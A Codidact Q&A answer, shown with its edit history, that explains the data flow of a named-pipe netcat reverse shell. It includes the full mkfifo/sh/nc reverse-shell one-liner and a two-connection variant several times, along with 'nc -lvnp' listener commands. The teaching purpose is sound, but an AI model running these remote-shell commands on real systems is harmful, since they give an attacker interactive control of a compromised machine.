Communities

Writing
Writing
Codidact Meta
Codidact Meta
The Great Outdoors
The Great Outdoors
Photography & Video
Photography & Video
Scientific Speculation
Scientific Speculation
Cooking
Cooking
Electrical Engineering
Electrical Engineering
Judaism
Judaism
Languages & Linguistics
Languages & Linguistics
Software Development
Software Development
Mathematics
Mathematics
Christianity
Christianity
Code Golf
Code Golf
Music
Music
Physics
Physics
Linux Systems
Linux Systems
Power Users
Power Users
Tabletop RPGs
Tabletop RPGs
Community Proposals
Community Proposals
tag:snake search within a tag
answers:0 unanswered questions
user:xxxx search by author id
score:0.5 posts with 0.5+ score
"snake oil" exact phrase
votes:4 posts with 4+ votes
created:<1w created < 1 week ago
post_type:xxxx type of post
Search help
Notifications
Mark all as read See all your notifications »
Q&A

Post History

75%
+4 −0
Q&A Reverse shell with named pipe and netcat

I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be no...

posted 10mo ago by Kamil Maciorowski‭  ·  edited 10mo ago by Kamil Maciorowski‭

Answer
#3: Post edited by user avatar Kamil Maciorowski‭ · 2023-06-28T19:52:54Z (10 months ago)
  • I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.
  • Some of the below paragraphs are important for understanding later paragraphs; they are not all standalone or independent.
  • ---
  • ### Continuity
  • Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, all "write from this to that" should rather be "start and keep writing …". I mean if there is a listening netcat server when `nc` in the pipe tries to connect to it then `cat`, `sh` and `nc` will not only run and write, they will keep running and writing.
  • ---
  • ### Useless use of `cat`
  • `cat` in your code is just a "relay", it's not really needed. The pipeline after `mkfifo` may as well be:
  • /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • This is the part designed to keep running. `cat` would only make the pipeline longer, but it wouldn't affect data flow.
  • ---
  • ### Filters and such
  • The concept is general. Pipes in a shell allow us to chain programs like this:
  • program1 <input | program2 | … | programN >output
  • (where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:
  • <input program1 | program2 | … | programN >output
  • Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.
  • Programs designed to work like this are called *filters*, especially if they work on textual data line-by-line and apply some modifications to their input before printing it as output. Example programs that are filters along with example (i.e. not exhaustive lists of) modifications they can apply:
  • - `cat` – no modification, identity filter
  • - `tr` – replacement or deletion of characters
  • - `grep` – deletion of non-matching lines
  • - `sed` – replacement or deletion of whole phrases
  • ---
  • ### Are `sh` and `nc` filters?
  • The pipeline in question may be written as:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • and it looks like a pipeline that chains two filters; or "filters". My intuition is `sh` and `nc` are filters only in the broadest meaning of "filter": they consume input and print some output; but they do not really *transform* input into output per se.
  • Take sole `sh -i` which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it a string `date\n` (where `\n` denotes the newline character) then "it" will respond with the output of `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, in some sense it will be a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`) and then the rest of the input stream will be filtered, but by itself `sh` is not a filter.
  • It's similar with `nc`. What it reads as input emerges as output from this other `nc` (`nc -l`) you run; and the input of the other `nc` emerges as output from the first `nc`. You can imagine a connected `nc`+`nc -l` pair as two `cat`s, i.e. two identity filters. The difference is each of these "cats" sits between input and output of different processes. I don't call `nc` a filter because for `nc` the output may or may not be its filtered input, it totally depends on how data flows from and to the other `nc`; and if `nc` happens to modify data like some filter, it's only because there is an actual filter (or filters) connected to the other `nc`.
  • ---
  • ### Is there a loop?
  • You wrote:
  • > I have a rough intuition that the steps above create an input/output loop between netcat and the shell
  • I wouldn't call it a loop. It's true that what you write to a named pipe (like `/tmp/f`) you can read from it, so the below pipeline *looks* like a loop, as it (as a whole) reads from where it writes to; but there are "loose ends" in the data flow. The pipeline:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • is really something like this:
  • ```
  • your screen -<-. (nc -l) .-<- your keyboard
  • | | START HERE
  • '---..----'
  • || network connection
  • .- sh or whatever sh runs -. .--''--.
  • | | | |
  • .->-' (sh) '->-' (nc) '->-.
  • | .----------------->--------. |
  • | | alleged loop | | actual flow
  • | '-----------------<--------' |
  • '----------------------- /tmp/f -<------------'
  • ```
  • The alleged loop breaks when you realize `nc` does not connect its input to its output, it's not a filter. It's like a pair of uni-directional connections to the other `nc` (`nc -l`). The other `nc` reads from your keyboard and prints to your screen, these are loose ends in our data flow.
  • Not only your keyboard and your screen are loose ends; `sh` plus its descendants are not necessarily a filter. This means we can observe two logically separate channels:
  • 1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.
  • Ultimately these are:
  • 1. your keyboard -> … -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> … -> your screen.
  • as if you run `sh -i` in a terminal (well, almost\*). Sole `sh -i` in the exploit couldn't access your terminal, the job of `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.
  • Even if what `sh` runs at the moment happens to be a filter, there will be no loop because between your screen and your keyboard there is you and you don't retype what you see (possibly with some modifications, like a filter); right?
  • ---
  • <sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system, it will be an elevated shell nevertheless.</sup>
  • ---
  • ### Why is `/tmp/f` needed?
  • `/tmp/f` is not necessary. To communicate with `sh -i` you could do:
  • </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null
  • and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different than the one you would use to give input.
  • It so happens a single connection is bi-directional. Using a single `nc`+`nc -l` pair for input and output like you did is convenient. But to use it as such you need to pipe from `nc` to `sh` and from the same `sh` to the same `nc`. You cannot straightforwardly do this with sole ad-hoc piping. There are coprocesses but they are not portable and more or less cumbersome (depending on the shell). Using a named pipe and creating what at first glance *looks* like a loop in data flow is a simple and convenient solution.
  • I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.
  • Some of the below paragraphs are important for understanding later paragraphs; they are not all standalone or independent.
  • ---
  • ### Continuity
  • Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, all "write from this to that" should rather be "start and keep writing …". I mean if there is a listening netcat server when `nc` in the pipe tries to connect to it then `cat`, `sh` and `nc` will not only run and write, they will keep running and writing.
  • ---
  • ### Useless use of `cat`
  • `cat` in your code is just a "relay", it's not really needed. The pipeline after `mkfifo` may as well be:
  • /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • This is the part designed to keep running. `cat` would only make the pipeline longer, but it wouldn't affect data flow.
  • ---
  • ### Filters and such
  • The concept is general. Pipes in a shell allow us to chain programs like this:
  • program1 <input | program2 | … | programN >output
  • (where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:
  • <input program1 | program2 | … | programN >output
  • Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.
  • Programs designed to work like this are called *filters*, especially if they work on textual data line-by-line and apply some modifications to their input before printing it as output. Example programs that are filters along with example (i.e. not exhaustive lists of) modifications they can apply:
  • - `cat` – no modification, identity filter
  • - `tr` – replacement or deletion of characters
  • - `grep` – deletion of non-matching lines
  • - `sed` – replacement or deletion of whole phrases
  • ---
  • ### Are `sh` and `nc` filters?
  • The pipeline in question may be written as:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • and it looks like a pipeline that chains two filters; or "filters". My intuition is `sh` and `nc` are filters only in the broadest meaning of "filter": they consume input and print some output; but they do not really *transform* input into output per se.
  • Take sole `sh -i` which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it a string `date\n` (where `\n` denotes the newline character) then "it" will respond with the output of `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, in some sense it will be a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`) and then the rest of the input stream will be filtered, but by itself `sh` is not a filter.
  • It's similar with `nc`. What it reads as input emerges as output from this other `nc` (`nc -l`) you run; and the input of the other `nc` emerges as output from the first `nc`. You can imagine a connected `nc`+`nc -l` pair as two `cat`s, i.e. two identity filters. The difference is each of these "cats" sits between input and output of different processes. I don't call `nc` a filter because for `nc` the output may or may not be its filtered input, it totally depends on how data flows from and to the other `nc`; and if `nc` happens to modify data like some filter, it's only because there is an actual filter (or filters) connected to the other `nc`.
  • ---
  • ### Is there a loop?
  • You wrote:
  • > I have a rough intuition that the steps above create an input/output loop between netcat and the shell
  • I wouldn't call it a loop. It's true that what you write to a named pipe (like `/tmp/f`) you can read from it, so the below pipeline *looks* like a loop, as it (as a whole) reads from where it writes to; but there are "loose ends" in the data flow. The pipeline:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • is really something like this:
  • ```
  • your screen -<-. (nc -l) .-<- your keyboard
  • | | START HERE
  • '---..----'
  • || network connection
  • .- sh or whatever sh runs -. .--''--.
  • | | | |
  • .->-' (sh) '->-' (nc) '->-.
  • | .----------------->--------. |
  • | | alleged loop | | actual flow
  • | '-----------------<--------' |
  • '----------------------- /tmp/f -<------------'
  • ```
  • The alleged loop breaks when you realize `nc` does not connect its input to its output, it's not a filter. It's like a pair of uni-directional connections to the other `nc` (`nc -l`). The other `nc` reads from your keyboard and prints to your screen, these are loose ends in our data flow.
  • Not only your keyboard and your screen are loose ends; `sh` plus its descendants are not necessarily a filter. This means we can observe two logically separate channels:
  • 1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.
  • Ultimately these are:
  • 1. your keyboard -> … -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> … -> your screen.
  • as if you run `sh -i` in a terminal (well, almost\*). Sole `sh -i` in the exploit couldn't access your terminal, the job of `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.
  • Even if what `sh` runs at the moment happens to be a filter, there will be no loop because between your screen and your keyboard there is you and you don't retype what you see (possibly with some modifications, like a filter); right?
  • ---
  • <sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system, it will be an elevated shell nevertheless.</sup>
  • ---
  • ### Why is `/tmp/f` needed?
  • `/tmp/f` is not necessary. To communicate with `sh -i` you could do:
  • </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null
  • and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different than the one you would use to give input.
  • It so happens a single connection is bi-directional. Using a single `nc`+`nc -l` pair for input and output like you did is convenient. But to use it as such you need to pipe from `nc` to `sh` and from the same `sh` to the same `nc`. You cannot straightforwardly do this with sole ad-hoc piping. There are coprocesses but they are not portable and they are more or less cumbersome (depending on the shell). Using a named pipe and creating what at first glance *looks* like a loop in data flow is a simple and convenient solution.
#2: Post edited by user avatar Kamil Maciorowski‭ · 2023-06-27T12:42:20Z (10 months ago)
  • I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.
  • Some of the below paragraphs are important for understanding later paragraphs; they are not all standalone or independent.
  • ---
  • ### Continuity
  • Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, all "write from this to that" should rather be "start and keep writing …". I mean if there is a listening netcat server when `nc` in the pipe tries to connect to it then `cat`, `sh` and `nc` will not only run and write, they will keep running and writing.
  • ---
  • ### Useless use of `cat`
  • `cat` in your code is just a "relay", it's not really needed. The pipeline after `mkfifo` may as well be:
  • /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • This is the part designed to keep running. `cat` would only make the pipeline longer, but it wouldn't affect data flow.
  • ---
  • ### Filters and such
  • The concept is general. Pipes in a shell allow us to chain programs like this:
  • program1 <input | program2 | … | programN >output
  • (where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:
  • <input program1 | program2 | … | programN >output
  • Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.
  • Programs designed to work like this are called *filters*, especially if they work on textual data line-by-line and apply some modifications to their input before printing it as output. Example programs that are filters along with example (i.e. not exhaustive lists of) modifications they can apply:
  • - `cat` – no modification, identity filter
  • - `tr` – replacement or deletion of characters
  • - `grep` – deletion of non-matching lines
  • - `sed` – replacement or deletion of whole phrases
  • ---
  • ### Are `sh` and `nc` filters?
  • The pipeline in question may be written as:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • and it looks like a pipeline that chains two filters; or "filters". My intuition is `sh` and `nc` are filters only in the broadest meaning of "filter": they consume input and print some output; but they do not really *transform* input into output per se.
  • Take sole `sh -i` which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it a string `date\n` (where `\n` denotes the newline character) then "it" will respond with the output of `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, in some sense it will be a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`) and then the rest of the input stream will be filtered, but by itself `sh` is not a filter.
  • It's similar with `nc`. What it reads as input emerges as output from this other `nc` (`nc -l`) you run; and the input of the other `nc` emerges as output from the first `nc`. The output of the `nc` in the pipe may or may not be its filtered input. It depends on how data flows from and to the other `nc`.
  • ---
  • ### Is there a loop?
  • You wrote:
  • > I have a rough intuition that the steps above create an input/output loop between netcat and the shell
  • I wouldn't call it a loop. It's true that what you write to a named pipe (like `/tmp/f`) you can read from it, so the below pipeline *looks* like a loop, as it (as a whole) reads from where it writes to; but there are "loose ends" in the data flow. The pipeline:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • is really something like this:
  • ```
  • your screen -<-. (nc -l) .-<- your keyboard
  • | | START HERE
  • '---..----'
  • || network connection
  • .- sh or whatever sh runs -. .--''--.
  • | | | |
  • .->-' (sh) '->-' (nc) '->-.
  • | .----------------->--------. |
  • | | alleged loop | | actual flow
  • | '-----------------<--------' |
  • '----------------------- /tmp/f -<------------'
  • ```
  • Not only your keyboard and your screen are loose ends; `sh` plus its descendants are not necessarily a filter. This means we can observe two logically separate channels:
  • 1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.
  • Ultimately these are:
  • 1. your keyboard -> … -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> … -> your screen.
  • as if you run `sh -i` in a terminal (well, almost\*). Sole `sh -i` in the exploit couldn't access your terminal, the job of `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.
  • Even if what `sh` runs at the moment happens to be a filter, there will be no loop because between your screen and your keyboard there is you and you don't retype what you see (possibly with some modifications, like a filter); right?
  • ---
  • <sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system, it will be an elevated shell nevertheless.</sup>
  • ---
  • ### Why is `/tmp/f` needed?
  • `/tmp/f` is not necessary. To communicate with `sh -i` you could do:
  • </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null
  • and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different than the one you would use to give input.
  • It so happens a single connection is bi-directional. Using a single `nc`+`nc -l` pair for input and output like you did is convenient. But to use it as such you need to pipe from `nc` to `sh` and from the same `sh` to the same `nc`. You cannot straightforwardly do this with sole ad-hoc piping. There are coprocesses but they are not portable and more or less cumbersome (depending on the shell). Using a named pipe and creating what at first glance *looks* like a loop in data flow is a simple and convenient solution.
  • I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.
  • Some of the below paragraphs are important for understanding later paragraphs; they are not all standalone or independent.
  • ---
  • ### Continuity
  • Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, all "write from this to that" should rather be "start and keep writing …". I mean if there is a listening netcat server when `nc` in the pipe tries to connect to it then `cat`, `sh` and `nc` will not only run and write, they will keep running and writing.
  • ---
  • ### Useless use of `cat`
  • `cat` in your code is just a "relay", it's not really needed. The pipeline after `mkfifo` may as well be:
  • /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • This is the part designed to keep running. `cat` would only make the pipeline longer, but it wouldn't affect data flow.
  • ---
  • ### Filters and such
  • The concept is general. Pipes in a shell allow us to chain programs like this:
  • program1 <input | program2 | … | programN >output
  • (where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:
  • <input program1 | program2 | … | programN >output
  • Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.
  • Programs designed to work like this are called *filters*, especially if they work on textual data line-by-line and apply some modifications to their input before printing it as output. Example programs that are filters along with example (i.e. not exhaustive lists of) modifications they can apply:
  • - `cat` – no modification, identity filter
  • - `tr` – replacement or deletion of characters
  • - `grep` – deletion of non-matching lines
  • - `sed` – replacement or deletion of whole phrases
  • ---
  • ### Are `sh` and `nc` filters?
  • The pipeline in question may be written as:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • and it looks like a pipeline that chains two filters; or "filters". My intuition is `sh` and `nc` are filters only in the broadest meaning of "filter": they consume input and print some output; but they do not really *transform* input into output per se.
  • Take sole `sh -i` which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it a string `date\n` (where `\n` denotes the newline character) then "it" will respond with the output of `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, in some sense it will be a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`) and then the rest of the input stream will be filtered, but by itself `sh` is not a filter.
  • It's similar with `nc`. What it reads as input emerges as output from this other `nc` (`nc -l`) you run; and the input of the other `nc` emerges as output from the first `nc`. You can imagine a connected `nc`+`nc -l` pair as two `cat`s, i.e. two identity filters. The difference is each of these "cats" sits between input and output of different processes. I don't call `nc` a filter because for `nc` the output may or may not be its filtered input, it totally depends on how data flows from and to the other `nc`; and if `nc` happens to modify data like some filter, it's only because there is an actual filter (or filters) connected to the other `nc`.
  • ---
  • ### Is there a loop?
  • You wrote:
  • > I have a rough intuition that the steps above create an input/output loop between netcat and the shell
  • I wouldn't call it a loop. It's true that what you write to a named pipe (like `/tmp/f`) you can read from it, so the below pipeline *looks* like a loop, as it (as a whole) reads from where it writes to; but there are "loose ends" in the data flow. The pipeline:
  • </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f
  • is really something like this:
  • ```
  • your screen -<-. (nc -l) .-<- your keyboard
  • | | START HERE
  • '---..----'
  • || network connection
  • .- sh or whatever sh runs -. .--''--.
  • | | | |
  • .->-' (sh) '->-' (nc) '->-.
  • | .----------------->--------. |
  • | | alleged loop | | actual flow
  • | '-----------------<--------' |
  • '----------------------- /tmp/f -<------------'
  • ```
  • The alleged loop breaks when you realize `nc` does not connect its input to its output, it's not a filter. It's like a pair of uni-directional connections to the other `nc` (`nc -l`). The other `nc` reads from your keyboard and prints to your screen, these are loose ends in our data flow.
  • Not only your keyboard and your screen are loose ends; `sh` plus its descendants are not necessarily a filter. This means we can observe two logically separate channels:
  • 1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.
  • Ultimately these are:
  • 1. your keyboard -> … -> `sh` or whatever `sh` runs,
  • 0. `sh` or whatever `sh` runs -> … -> your screen.
  • as if you run `sh -i` in a terminal (well, almost\*). Sole `sh -i` in the exploit couldn't access your terminal, the job of `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.
  • Even if what `sh` runs at the moment happens to be a filter, there will be no loop because between your screen and your keyboard there is you and you don't retype what you see (possibly with some modifications, like a filter); right?
  • ---
  • <sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system, it will be an elevated shell nevertheless.</sup>
  • ---
  • ### Why is `/tmp/f` needed?
  • `/tmp/f` is not necessary. To communicate with `sh -i` you could do:
  • </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null
  • and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different than the one you would use to give input.
  • It so happens a single connection is bi-directional. Using a single `nc`+`nc -l` pair for input and output like you did is convenient. But to use it as such you need to pipe from `nc` to `sh` and from the same `sh` to the same `nc`. You cannot straightforwardly do this with sole ad-hoc piping. There are coprocesses but they are not portable and more or less cumbersome (depending on the shell). Using a named pipe and creating what at first glance *looks* like a loop in data flow is a simple and convenient solution.
#1: Initial revision by user avatar Kamil Maciorowski‭ · 2023-06-27T12:21:02Z (10 months ago)
I'm not sure which exact fragment, functionality or aspect is problematic to you. Here I will make points (paragraphs) about what I used to struggle to understand, or about what I suspect may be not-quite-easy to understand.

Some of the below paragraphs are important for understanding later paragraphs; they are not all standalone or independent.

---

### Continuity

Your literal reading of the command is right, but it does not stress continuity. While "create a new named pipe" is a one-time action, all "write from this to that" should rather be "start and keep writing …". I mean if there is a listening netcat server when `nc` in the pipe tries to connect to it then `cat`, `sh` and `nc` will not only run and write, they will keep running and writing.

---

### Useless use of `cat`

`cat` in your code is just a "relay", it's not really needed. The pipeline after `mkfifo` may as well be:

    /bin/sh -i </tmp/f 2>&1 | nc 127.0.0.1 4445 >/tmp/f

This is the part designed to keep running. `cat` would only make the pipeline longer, but it wouldn't affect data flow.

---

### Filters and such

The concept is general. Pipes in a shell allow us to chain programs like this:

    program1 <input | program2 | … | programN >output

(where any `program` may take command line arguments, but for brevity I used no arguments). I prefer a slightly different arrangement of tokens:

    <input program1 | program2 | … | programN >output

Here, by reading from left to right, we expect data to flow from `input` through `program1`, `program2`, …, `programN` to `output`.

Programs designed to work like this are called *filters*, especially if they work on textual data line-by-line and apply some modifications to their input before printing it as output. Example programs that are filters along with example (i.e. not exhaustive lists of) modifications they can apply:

- `cat` – no modification, identity filter
- `tr` – replacement or deletion of characters
- `grep` – deletion of non-matching lines
- `sed` – replacement or deletion of whole phrases

---

### Are `sh` and `nc` filters?

The pipeline in question may be written as:

    </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f

and it looks like a pipeline that chains two filters; or "filters". My intuition is `sh` and `nc` are filters only in the broadest meaning of "filter": they consume input and print some output; but they do not really *transform* input into output per se.

Take sole `sh -i` which in an interactive shell is equivalent to `</dev/tty sh -i >/dev/tty 2>/dev/tty`. If you feed it a string `date\n` (where `\n` denotes the newline character) then "it" will respond with the output of `date` command. The output will come from `date`, not from `sh`; and it won't be a transformation of the input stream, in some sense it will be a reaction to it. Therefore I don't call `sh` a filter. You can use it to run a real filter (e.g. `grep …`) and then the rest of the input stream will be filtered, but by itself `sh` is not a filter.

It's similar with `nc`. What it reads as input emerges as output from this other `nc` (`nc -l`) you run; and the input of the other `nc` emerges as output from the first `nc`. The output of the `nc` in the pipe may or may not be its filtered input. It depends on how data flows from and to the other `nc`.

---

### Is there a loop?

You wrote:

> I have a rough intuition that the steps above create an input/output loop between netcat and the shell

I wouldn't call it a loop. It's true that what you write to a named pipe (like `/tmp/f`) you can read from it, so the below pipeline *looks* like a loop, as it (as a whole) reads from where it writes to; but there are "loose ends" in the data flow. The pipeline:

    </tmp/f /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/tmp/f

is really something like this:

```
                   your screen -<-. (nc -l) .-<- your keyboard
                                  |         |    START HERE
                                  '---..----'
                                      || network connection
    .- sh or whatever sh runs -.   .--''--.
    |                          |   |      |
.->-'            (sh)          '->-' (nc) '->-.
|              .----------------->--------.   |
|              |       alleged loop       |   | actual flow
|              '-----------------<--------'   |
'----------------------- /tmp/f -<------------'
```

Not only your keyboard and your screen are loose ends; `sh` plus its descendants are not necessarily a filter. This means we can observe two logically separate channels:

1. your keyboard -> `nc -l` -> `nc` -> `/tmp/f` -> `sh` or whatever `sh` runs,
0. `sh` or whatever `sh` runs -> `nc` -> `nc -l` -> your screen.

Ultimately these are:

1. your keyboard -> … -> `sh` or whatever `sh` runs,
0. `sh` or whatever `sh` runs -> … -> your screen.

as if you run `sh -i` in a terminal (well, almost\*). Sole `sh -i` in the exploit couldn't access your terminal, the job of `nc`s and `/tmp/f` is to connect this `sh -i` to your terminal.

Even if what `sh` runs at the moment happens to be a filter, there will be no loop because between your screen and your keyboard there is you and you don't retype what you see (possibly with some modifications, like a filter); right?

---

<sup>\* Almost, because genuinely running a process in a terminal makes the terminal a controlling terminal for the process. This has useful consequences (e.g. ability to generate SIGINT upon <kbd>Ctrl</kbd>+<kbd>c</kbd>). The shell you get from the exploit will behave *not entirely* like `sh -i` run in a terminal. This will not limit what you can do to the system, it will be an elevated shell nevertheless.</sup>

---

### Why is `/tmp/f` needed?

`/tmp/f` is not necessary. To communicate with `sh -i` you could do:

    </dev/null nc 127.0.0.1 4446 | /bin/sh -i 2>&1 | nc 127.0.0.1 4445 >/dev/null

and run `nc -lvnp 4445` *and* `nc -lvnp 4446` to create one connection for receiving output of `sh` (and its descendants) and one connection for supplying input. The easiest way would be to use two terminals (terminal emulators), but then you would observe output in a terminal different than the one you would use to give input.

It so happens a single connection is bi-directional. Using a single `nc`+`nc -l` pair for input and output like you did is convenient. But to use it as such you need to pipe from `nc` to `sh` and from the same `sh` to the same `nc`. You cannot straightforwardly do this with sole ad-hoc piping. There are coprocesses but they are not portable and more or less cumbersome (depending on the shell). Using a named pipe and creating what at first glance *looks* like a loop in data flow is a simple and convenient solution.